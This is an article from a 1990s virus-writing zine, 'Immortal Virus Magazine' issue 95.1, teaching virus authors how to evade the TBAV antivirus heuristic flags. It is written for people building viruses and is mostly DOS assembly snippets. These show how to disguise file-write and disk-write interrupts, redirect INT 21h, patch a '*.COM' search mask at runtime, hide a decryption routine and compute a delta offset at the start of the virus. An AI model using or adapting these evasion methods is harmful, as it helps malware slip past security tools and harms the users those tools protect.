------------------------------Immortal Virus Magazine-------------------------
-----------------------------------Issue 95.1----------------------------------
-----------------------------TBAV fooling techiniques--------------------------

The heuristic scans we will discuss are:

 - F : Suspicious file-access
 - S : Search for .EXE / .COM files
 - D : Direct disk access
 - # : Encryption and/or debugger trap
 - G : Grabage instructions
 - E : Flexible entrypoint
-------------------------------------------------------------------------------
- F : Suspicious file-access

 There are different ways to fool TBAV on this one.
1.) The easiest way is to add 10 or something at the MOVe instruction
     and then SUBstract 10: TBAV will think you use the original MOVe.
      e.g:   MOV  AH, 50h
             SUB  AH, 10h       ;50h will turn into 40h Dos fnc: Write
             INT  21h

2.) This is a bit tougher, you redirect int 21h to some other unused
     interrupt. There is no need to unlink the new interrupt.

      e.g:   MOV  AX, 3521h     ;Get dos int address in ES:BX
             INT  21H
             PUSH ES            ;DS == ES
             POP  DS
             MOV  AX, 2560h     ;Int 60H will become int 21h
             INT  21h
             MOV  AH, 40h       ;Dos fnc: Write
             INT  60h           ;The new interrupt
-------------------------------------------------------------------------------
- S : Search for .EXE / .COM files

 There are again a few ways to fool TBAV on this one.
1.) Somewhere in your virus is a filespec (e.g. '*.COM'), just change the
     '*' into something else ('Z.COM') and when the function 3Fh or something
     is called change it to a '*' again, afterwards change it to a 'Z' again.

      e.g:   MOV  BYTE PTR [FSPC+BP],'*' 
             MOV  AX,3F00h
             INT  21h
             MOV  BYTE PTR [FSPC+BP],'Z'

             FSPC DB 'Z.COM',0

2.) You can also use the first technique about hiding the 'F' flag.
-------------------------------------------------------------------------------
- D : Direct disk access

 Once again there are a few ways to let TBAV eat his 'D' flag.
1.) Change the INT 26h realtime: Create a label or something and put
     an int 21h or something, and change it to int 26h in your virus.

      e.g.   MOV  BYTE PTR [I26L+1+BP],26h      ;Change INT 21h to INT 26h
       I26L: INT  21h                           ;Here will be the INT 26h
             MOV  BYTE PTR [I26L+1+BP],21h      ;Change INT 26h to INT 21h

2.) You can also use the second technique about hiding the 'F' flag.
-------------------------------------------------------------------------------
- # : Encryption and/or debugger trap

 Once again there are several ways to shit TBAV.
1.) For a debugger trap you can use the first techinique about the 'F' flag.
2.) Use an unlogic call stucture. First CALL the decryption routine, then
     JuMP to the main virus.

      e.g.   CALL  DC                   ;Call your decryption routine
             JMP   ST                   ;JuMP to the start of your virus
             NOP                        ;To fool TBAV
         ST: .                          ;Put your virus here
             .
             .
         DC: RET                        ;Put the decryption routine here!
-------------------------------------------------------------------------------
- G : Garbage instructions

 There's one thing to do to get rid of this flag.
             OPTIMIZE!
      e.g.   You can turn turn two nops into two eXCHanGes:
             NOP
             NOP
             will be:
             XCHG  AX,BX
             XCHG  CX,AX
             or something like that.
 You can also put often used routines in a CALL routine (e.g. Get Time,etc)
-------------------------------------------------------------------------------
- E : Flexible entry-point

 There are many ways to avoid this, the best one is to put this little
  routine at the beginning of your virus:

             XCHG  AX,BX                ;Avoid 'G' & 'E' flags
             XCHG  CX,AX
             CALL  DELTA
  DELTA:     POP   BP
             SUB   BP, OFFSET DELTA

             Entrypoint will be in BP
-------------------------------------------------------------------------------
By: [Hacking Hell]